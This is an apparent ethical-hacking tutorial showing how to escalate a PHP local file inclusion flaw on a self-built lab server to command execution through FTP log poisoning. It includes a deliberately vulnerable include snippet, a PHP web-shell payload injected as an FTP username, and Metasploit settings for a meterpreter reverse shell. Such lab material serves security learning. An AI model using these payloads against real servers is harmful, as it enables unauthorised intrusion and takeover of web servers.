In this article, you will learn how to take access in any web server through ftp log poisoning if it is suffering from local file inclusion vulnerability.
What is PHP File Inclusion ?
With the help of include function you can include the content of php into another php file before server execute it. There are two important PHP functions.
- The include() Function
- The require() Function
What is Local File Inclusion ?
local File Inclusion vulnerability allows an attacker to upload his malicious script on the web server to be execute locally .
If the file inclusion vulnerability is found in the web server so you can perform the following attacks.
- Remote Code Execution (RCE)
- Cross-site Scripting (XSS)
- Denial of Service (DOS)
Kali Linux – Attacker
Lets Start !!
First, You should have to configured apache server on your kali machine and After then create a directory by using following command.
Now, we have to go on that directory by using following commands for create a php file.
Open the lfi.php file in your favorite text editor and paste the code which is given below.
$file = $_GET['file'];
This file allow an user to include a file on web server through a file parameter.
Great ! You can observe when we execute the given url on browser it provide users and accounts details of the web server that means the target web server is effected by local file inclusion vulnerability.
We already have installed ftp server on our kali machine you can see by below given image.
Now, we need to give read and write permission to log file.
chmod -R 775 /var/log/vsftpd.log
After give the permission you can access vsftpd.log file on your browser.
The vsftpd.conf file generates a log for every success and failed login attempt. Now, we try to connect to ftp port with using malicious php code as name which will help to create a fake logs on vsftpd.log file.
ftp 192.168.0.103 (remote ip)
'<?php system($_GET['c']); ?>'
When you will check log file by using these command So you will find the malicious php code has been added a new log.
tail -f vsftpd.log
Now, we have command prompt of web server so we can execute any command such as :
ls - list
pwd - present working directory
If you want to get full control on web server so can use metasploit framework to exploit the web server.
set target 1
set payload php/meterpreter/reverse_tcp
set uripath /
set srvhost 192.168.0.103
set lhost 192.168.0.103
Copy the highlighted text and paste on browser as shown given below.
After execute it, you will get meterpreter of the web server.
A keen learner and passionate IT student. He has done Web designing, CCNA, RedHat, Ethical hacking, Network & web penetration testing. Currently, he is completing his graduation and learning about Red teaming, CTF challenges & Blue teaming.